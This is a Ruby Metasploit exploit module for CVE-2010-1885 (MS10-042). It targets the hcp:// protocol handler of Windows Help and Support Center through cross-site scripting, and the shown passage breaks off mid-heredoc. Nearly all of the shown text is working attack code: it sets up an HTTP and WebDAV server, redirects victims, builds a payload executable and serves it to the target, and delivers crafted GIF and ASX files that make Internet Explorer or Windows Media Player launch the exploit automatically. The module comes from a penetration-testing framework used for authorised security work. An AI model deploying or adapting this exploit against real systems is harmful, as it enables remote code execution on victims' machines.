## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Help Center XSS and Command Execution', 'Description' => %q{ Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme "hcp". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to "none" or "player". This module creates a WebDAV service from which the payload is copied to the victim machine. }, 'Author' => [ 'Tavis Ormandy', # Original discovery 'natron' # Metasploit version ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2010-1885' ], [ 'OSVDB', '65264' ], [ 'MSB', 'MS10-042'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => '2010-06-09', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), OptString.new('URIPATH', [ true, "The URI to use (do not change).", "/" ]), OptString.new('DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"]) ] ) deregister_options('SSL', 'SSLVersion') # Just for now end def on_request_uri(cli, request) # If there is no subdirectory in the request, we need to redirect. if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//) if (request.uri == '/') subdir = '/' + rand_text_alphanumeric(8 + rand(8)) + '/' else subdir = request.uri + '/' end print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...") send_redirect(cli, subdir) return end case request.method when 'OPTIONS' process_options(cli, request) when 'PROPFIND' process_propfind(cli, request) when 'GET' process_get(cli, request) else print_error("Unexpected request method encountered: #{request.method}") end end def process_get(cli, request) @my_host = srvhost_addr webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}" @url_base = "http://" + @my_host if (Regexp.new(Regexp.escape(@payload) + '$', Regexp::IGNORECASE).match(request.uri)) print_status "Sending payload executable to target ..." return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end if request.uri.match(/\.gif$/) # "world's smallest gif" data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01" data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;" print_status "Sending gif image to WMP" send_response(cli, data, { 'Content-TYpe' => 'image/gif' }) end # ASX Request Inbound if request.uri.match(/\.asx$/) asx = %Q| | asx.gsub!(/URLBASE/, @url_base) asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help) asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file) print_status("Sending asx file") send_response(cli, asx, { 'Content-Type' => 'text/html' }) return end # iframe request inbound from either WMP or IE7 if request.uri.match(/#{@start_help}/) help_html = <<~EOS